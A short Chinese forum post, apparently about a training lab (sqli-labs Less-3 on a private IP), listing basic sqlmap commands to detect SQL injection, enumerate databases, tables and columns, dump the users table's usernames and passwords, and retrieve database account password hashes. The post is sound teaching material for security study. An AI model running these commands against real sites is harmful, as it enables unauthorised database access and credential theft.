-
-
[推荐]sqlmap基础使用方法
-
发表于:
2020-1-19 15:33
2182
-
小白路过,大佬勿喷!!!
--batch可以不用交互默认进行
检测注入点
sqlmap.py -u http://10.240.4.213/sql/Less-3/?id=1
查看所有数据库
sqlmap.py -u http://10.240.4.213/sql/Less-3/?id=1 --dbs
查看当前数据库
sqlmap.py -u http://10.240.4.213/sql/Less-3/?id=1 --current-db --batch
列出数据库中的表
sqlmap.py -u http://10.240.4.213/sql/Less-3/?id=1 -D security --tables --batch
-D 指定数据库名
--tables 列出表
列出表中字段
sqlmap.py -u http://10.240.4.213/sql/Less-3/?id=1 -D security -T users --columns --batch
sqlmap.py -u http://10.240.4.213/sql/Less-3/?id=1 -D security -T users -C "username,password" --dump --batch
-C 指定的字段
--dump 将结果导出
当前数据库使用账户
sqlmap.py -u http://10.240.4.213/sql/Less-3/?id=1 --current-user --batch
列出数据库所有用户
sqlmap.py -u http://10.240.4.213/sql/Less-3/?id=1 --users --batch
获取数据库账户密码
sqlmap.py -u http://10.240.4.213/sql/Less-3/?id=1 --passwords --batch
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
最后于 2020-1-19 15:38
被xiaobaijia编辑
,原因: